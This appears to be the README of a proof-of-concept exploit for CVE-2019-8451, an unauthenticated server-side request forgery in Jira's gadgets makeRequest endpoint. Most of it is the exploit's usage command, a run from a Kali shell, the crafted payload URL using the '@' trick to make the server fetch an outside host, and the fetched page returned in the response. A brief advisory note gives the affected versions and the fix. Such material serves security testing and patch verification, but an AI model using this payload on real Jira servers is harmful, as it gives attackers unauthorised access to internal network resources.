Awesome
CVE-2019-8451 Jira未授权SSRF漏洞
python usage
python CVE-2019-8451.py http://www.jas502n.com:8080
root@kali:~/CVE-2019-8451# python CVE-2019-8451.py http://www.jas502n.com:8080
>>>>SSRF URL: www.baidu.com
>>>>Send poc Success!
X-AUSERNAME= anonymous
>>>>vuln_url= http://www.jas502n.com:8080/plugins/servlet/gadgets/makeRequest?url=http://www.jas502n.com:8080@www.baidu.com
throw 1; < don't be evil' >{"http://www.jas502n.com:8080@www.baidu.com":{"rc":200,"headers":{"set-cookie":["BDORZ=27315; max-age=86400; domain=.baidu.com; path=/"]},"body":"<!DOCTYPE html>\r\n<!--STATUS OK--><html> <head><meta http-equiv=content-type content=text/html;charset=utf-8><meta http-equiv=X-UA-Compatible content=IE=Edge><meta content=always name=referrer><link rel=stylesheet type=text/css href=http://s1.bdstatic.com/r/www/cache/bdorz/baidu.min.css><title>百度一下,你就知道<\/title><\/head> <body link=#0000cc> <div id=wrapper> <div id=head> <div class=head_wrapper> <div class=s_form> <div class=s_form_wrapper> <div id=lg> <img hidefocus=true src=//www.baidu.com/img/bd_logo1.png width=270 height=129> <\/div> <form id=form name=f action=//www.baidu.com/s class=fm> <input type=hidden name=bdorz_come value=1> <input type=hidden name=ie value=utf-8> <input type=hidden name=f value=8> <input type=hidden name=rsv_bp value=1> <input type=hidden name=rsv_idx value=1> <input type=hidden name=tn value=baidu><span class=\"bg s_ipt_wr\"><input id=kw name=wd class=s_ipt value maxlength=255 autocomplete=off autofocus><\/span><span class=\"bg s_btn_wr\"><input type=submit id=su value=百度一下 class=\"bg s_btn\"><\/span> <\/form> <\/div> <\/div> <div id=u1> <a href=http://news.baidu.com name=tj_trnews class=mnav>新闻<\/a> <a href=http://www.hao123.com name=tj_trhao123 class=mnav>hao123<\/a> <a href=http://map.baidu.com name=tj_trmap class=mnav>地图<\/a> <a href=http://v.baidu.com name=tj_trvideo class=mnav>视频<\/a> <a href=http://tieba.baidu.com name=tj_trtieba class=mnav>贴吧<\/a> <noscript> <a href=http://www.baidu.com/bdorz/login.gif?login&tpl=mn&u=http%3A%2F%2Fwww.baidu.com%2f%3fbdorz_come%3d1 name=tj_login class=lb>登录<\/a> <\/noscript> <script>document.write('<a href=\"http://www.baidu.com/bdorz/login.gif?login&tpl=mn&u='+ encodeURIComponent(window.location.href+ (window.location.search === \"\" ? \"?\" : \"&\")+ \"bdorz_come=1\")+ '\" name=\"tj_login\" class=\"lb\">登录<\/a>');<\/script> <a href=//www.baidu.com/more/ name=tj_briicon class=bri style=\"display: block;\">更多产品<\/a> <\/div> <\/div> <\/div> <div id=ftCon> <div id=ftConw> <p id=lh> <a href=http://home.baidu.com>关于百度<\/a> <a href=http://ir.baidu.com>About Baidu<\/a> <\/p> <p id=cp>©2017 Baidu <a href=http://www.baidu.com/duty/>使用百度前必读<\/a> <a href=http://jianyi.baidu.com/ class=cp-feedback>意见反馈<\/a> 京ICP证030173号 <img src=//www.baidu.com/img/gs.gif> <\/p> <\/div> <\/div> <\/div> <\/body> <\/html>\r\n"}}
>>>>SSRF URL:
0x01 SSRF in the /plugins/servlet/gadgets/makeRequest resource - CVE-2019-8451
The /plugins/servlet/gadgets/makeRequest resource in Jira before version 8.4.0 allows remote attackers to access the content of internal network resources via a Server Side Request Forgery (SSRF) vulnerability due to a logic bug in the JiraWhitelist class.
Fixed in Version/s: 8.4.0